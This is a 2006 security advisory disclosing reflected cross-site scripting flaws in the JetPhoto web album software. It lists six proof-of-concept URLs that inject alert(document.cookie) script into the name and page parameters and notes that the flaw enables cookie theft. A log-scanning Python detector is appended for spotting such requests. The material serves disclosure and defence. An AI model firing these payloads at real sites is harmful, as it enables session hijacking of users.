
11.txt

Posted Apr 12, 2006
Authored by zeus | Site elitemexico.org

JetPhoto suffers from multiple XSS vulnerabilities.

tags | advisory, vulnerability
SHA-256 | e3c238a7616e388bee872a96391f6527e3f02b129d5f0a36bd1567d28aa00433


###########################################################################
# Advisory #11 Title: JetPhoto Multiple Cross-Site Scripting Vulnerabilities
#
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus@diosdelared.com
# Website: www.elitemexico.org
# Date: 10/04/06
# Risk: Medium
# Vendor Url: https://www.jetphotosoft.com
# Affected Software: JetPhoto
# Non Affected:
#
#Info:
##################################################################
#This bug consists of inserting script into the line of execution of the
#affected system, which allows cookie theft.
#
#Example XSS:
##################################################################
#
#https://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=webalbum&page=<script>alert(document.cookie);</script>
#
#https://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</script>
#
#https://www.vuln.com/[path]/view/Classic.view/gallery.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</script>
#
#https://www.vuln.com/[path]/view/Classic.view/detail.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</script>
#
#https://www.vuln.com/[path]/view/Orange.view/slideshow.php?name=<script></script><script>alert(document.cookie);</script>
#
#https://www.vuln.com/[path]/view/Orange.view/detail.php?name=1&page=<script>alert(document.cookie);</script>
#
##################################################################
#
#Solution:
##################################################################
#
#
#VULNERABLE VERSIONS
##################################################################
#all
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus@diosdelared.com
#www.elitemexico.org
##################################################################
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
#
# Original advisory: https://www.elitemexico.org/11.txt
##################################################################
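
A defensive check for the requests listed above, added here as an example (it is not part of the original advisory or of JetPhoto's code): it scans web-server access logs for requests to the listed scripts whose `name` or `page` value carries HTML markup characters, including percent-encoded and double-encoded forms. The Combined Log Format, the sample lines and all function names are assumptions; matching any `*.view` theme directory generalizes beyond the two themes the advisory names.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Scripts and parameters named in the advisory; any *.view theme directory is matched.
AFFECTED = re.compile(r"/view/[^/]+\.view/(thumbnail|gallery|detail|slideshow)\.php$")
PARAMS = {"name", "page"}
MARKUP = re.compile(r"[<>\"']")  # characters that can break out into HTML
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return [(param, decoded_value)] for name/page values carrying markup."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not AFFECTED.search(url.path):
        return []
    hits = []
    for key, raw in parse_qsl(url.query, keep_blank_values=True):
        value = decode_fully(raw)  # parse_qsl has already decoded once
        if key in PARAMS and MARKUP.search(value):
            hits.append((key, value))
    return hits


# Constructed sample log lines (Combined Log Format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Apr/2006:10:00:01 +0000] "GET /album/view/Classic.view/thumbnail.php?name=webalbum&page=2 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [12/Apr/2006:10:00:05 +0000] "GET /album/view/Classic.view/gallery.php?name=JetPhoto_Album&page=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4301',
    '198.51.100.9 - - [12/Apr/2006:10:00:09 +0000] "GET /album/view/Orange.view/slideshow.php?name=%253Cscript%253E HTTP/1.1" 200 3987',
    '198.51.100.3 - - [12/Apr/2006:10:00:12 +0000] "GET /index.php?page=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for param, value in suspicious_params(line):
            print(f"{line.split()[0]} {param}={value!r}")
```

A hit means the request reached one of the listed scripts with markup in `name` or `page`; whether it was reflected unescaped still has to be confirmed against the response.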

